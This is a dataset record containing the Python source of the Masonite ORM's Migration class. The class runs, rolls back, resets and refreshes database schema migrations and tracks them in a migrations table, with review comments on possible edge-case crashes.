] | 94 | 2020-02-08T21:08:56.000Z | 2022-03-28T15:24:52.000Z | src/masoniteorm/migrations/Migration.py | alfonsocv12/orm | 87b2532c7673a28c143600329df68e0343607f55 | [
"MIT"
] | 441 | 2020-02-09T06:17:44.000Z | 2022-03-30T07:27:39.000Z | src/masoniteorm/migrations/Migration.py | alfonsocv12/orm | 87b2532c7673a28c143600329df68e0343607f55 | [
"MIT"
] | 28 | 2020-02-26T10:29:05.000Z | 2022-03-30T19:08:28.000Z | import os
from os import listdir
from os.path import isfile, join
from pydoc import locate
from inflection import camelize
from ..models.MigrationModel import MigrationModel
from ..schema import Schema
from ..config import load_config
from timeit import default_timer as timer
class Migration:
    """Coordinates running, rolling back, and recording schema migrations.

    Bridges migration files on disk (under ``migration_directory``) and the
    ``migrations`` bookkeeping table (via ``MigrationModel``). When
    ``command_class`` is supplied, progress is reported through its styled
    CLI output.
    """

    def __init__(
        self,
        connection="default",
        dry=False,
        command_class=None,
        migration_directory="databases/migrations",
        config_path=None,
    ):
        """Build a Schema for *connection* and bind the bookkeeping model."""
        self.connection = connection
        self.migration_directory = migration_directory
        self.last_migrations_ran = []
        self.command_class = command_class
        DB = load_config(config_path).DB
        DATABASES = DB.get_connection_details()
        self.schema = Schema(
            connection=connection, connection_details=DATABASES, dry=dry
        )
        self.migration_model = MigrationModel.on(self.connection)

    def create_table_if_not_exists(self):
        """Create the ``migrations`` table; return True only if it was created."""
        if self.schema.has_table("migrations"):
            return False
        with self.schema.create("migrations") as table:
            table.increments("migration_id")
            table.string("migration")
            table.integer("batch")
        return True

    def _migration_files_on_disk(self):
        """Return the sorted stem names of migration files in the directory."""
        directory_path = os.path.join(os.getcwd(), self.migration_directory)
        stems = [
            f.replace(".py", "")
            for f in listdir(directory_path)
            if isfile(join(directory_path, f)) and f != "__init__.py"
        ]
        stems.sort()
        return stems

    def get_unran_migrations(self):
        """Return migrations present on disk but not recorded in the database."""
        database_migrations = self.migration_model.all()
        return [
            migration
            for migration in self._migration_files_on_disk()
            if migration not in database_migrations.pluck("migration")
        ]

    def get_rollback_migrations(self):
        """Return the most recent batch's migration names, newest first."""
        return (
            self.migration_model.where("batch", self.migration_model.all().max("batch"))
            .order_by("migration_id", "desc")
            .get()
            .pluck("migration")
        )

    def get_all_migrations(self, reverse=False):
        """Return every recorded migration name, optionally newest first."""
        if reverse:
            return (
                self.migration_model.order_by("migration_id", "desc")
                .get()
                .pluck("migration")
            )
        return self.migration_model.all().pluck("migration")

    def get_last_batch_number(self):
        """Return the highest recorded batch number."""
        return self.migration_model.select("batch").get().max("batch")

    def delete_migration(self, file_path):
        """Remove a single migration record by name."""
        return self.migration_model.where("migration", file_path).delete()

    def locate(self, file_name):
        """Import and return the migration class defined in *file_name*.

        The class name is derived by dropping the first four
        underscore-separated segments of the stem (the timestamp prefix)
        and camelizing the remainder.
        """
        migration_name = camelize("_".join(file_name.split("_")[4:]).replace(".py", ""))
        file_name = file_name.replace(".py", "")
        migration_directory = self.migration_directory.replace("/", ".").replace(
            "\\", "."
        )
        # Inside this method, `locate` resolves to pydoc.locate (module
        # global), not this method.
        return locate(f"{migration_directory}.{file_name}.{migration_name}")

    def get_ran_migrations(self):
        """Return migrations present on disk that are recorded as run."""
        database_migrations = self.migration_model.all()
        return [
            migration
            for migration in self._migration_files_on_disk()
            if migration in database_migrations.pluck("migration")
        ]

    def migrate(self, migration="all", output=False):
        """Run pending migrations (or a single named one).

        With *output* truthy, the SQL is rendered instead of committed to
        the migrations table (dry mode when a command class is present).
        """
        default_migrations = self.get_unran_migrations()
        migrations = default_migrations if migration == "all" else [migration]
        # NOTE(review): assumes get_last_batch_number() never returns None
        # on an empty table -- confirm against MigrationModel.max().
        batch = self.get_last_batch_number() + 1
        for migration in migrations:
            try:
                migration_class = self.locate(migration)
            except TypeError:
                # NOTE(review): crashes if command_class is None; preserved.
                self.command_class.line(f"<error>Not Found: {migration}</error>")
                continue
            self.last_migrations_ran.append(migration)
            if self.command_class:
                self.command_class.line(
                    f"<comment>Migrating:</comment> <question>{migration}</question>"
                )
            migration_class = migration_class(connection=self.connection)
            if output:
                migration_class.schema.dry()
            start = timer()
            migration_class.up()
            duration = "{:.2f}".format(timer() - start)
            if output:
                if self.command_class:
                    table = self.command_class.table()
                    table.set_header_row(["SQL"])
                    sql = migration_class.schema._blueprint.to_sql()
                    if isinstance(sql, list):
                        sql = ",".join(sql)
                    table.set_rows([[sql]])
                    table.render(self.command_class.io)
                    continue
                else:
                    print(migration_class.schema._blueprint.to_sql())
            if self.command_class:
                self.command_class.line(
                    f"<info>Migrated:</info> <question>{migration}</question> ({duration}s)"
                )
            self.migration_model.create(
                {"batch": batch, "migration": migration.replace(".py", "")}
            )

    def rollback(self, migration="all", output=False):
        """Roll back the latest batch (or a single named migration)."""
        default_migrations = self.get_rollback_migrations()
        migrations = default_migrations if migration == "all" else [migration]
        for migration in migrations:
            if self.command_class:
                self.command_class.line(
                    f"<comment>Rolling back:</comment> <question>{migration}</question>"
                )
            try:
                migration_class = self.locate(migration)
            except TypeError:
                self.command_class.line(f"<error>Not Found: {migration}</error>")
                continue
            migration_class = migration_class(connection=self.connection)
            if output:
                migration_class.schema.dry()
            start = timer()
            migration_class.down()
            duration = "{:.2f}".format(timer() - start)
            if output:
                if self.command_class:
                    table = self.command_class.table()
                    table.set_header_row(["SQL"])
                    if (
                        hasattr(migration_class.schema, "_blueprint")
                        and migration_class.schema._blueprint
                    ):
                        sql = migration_class.schema._blueprint.to_sql()
                        if isinstance(sql, list):
                            sql = ",".join(sql)
                        table.set_rows([[sql]])
                    elif migration_class.schema._sql:
                        table.set_rows([[migration_class.schema._sql]])
                    table.render(self.command_class.io)
                    continue
                else:
                    print(migration_class.schema._blueprint.to_sql())
            self.delete_migration(migration)
            if self.command_class:
                self.command_class.line(
                    f"<info>Rolled back:</info> <question>{migration}</question> ({duration}s)"
                )

    def delete_migrations(self, migrations=None):
        """Remove migration records for every name in *migrations*."""
        return self.migration_model.where_in("migration", migrations or []).delete()

    def delete_last_batch(self):
        """Remove every record belonging to the most recent batch."""
        return self.migration_model.where(
            "batch", self.get_last_batch_number()
        ).delete()

    def reset(self):
        """Run ``down()`` for every recorded migration, newest first."""
        for migration in self.get_all_migrations(reverse=True):
            if self.command_class:
                self.command_class.line(
                    f"<comment>Rolling back:</comment> <question>{migration}</question>"
                )
            try:
                self.locate(migration)(connection=self.connection).down()
            except TypeError:
                self.command_class.line(f"<error>Not Found: {migration}</error>")
                continue
                # raise MigrationNotFound(f"Could not find {migration}")
            self.delete_migration(migration)
            if self.command_class:
                self.command_class.line(
                    f"<info>Rolled back:</info> <question>{migration}</question>"
                )
            self.delete_migrations([migration])
        if self.command_class:
            self.command_class.line("")

    def refresh(self):
        """Tear everything down with reset(), then migrate from scratch."""
        self.reset()
        self.migrate()
| 33.914397 | 95 | 0.563447 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.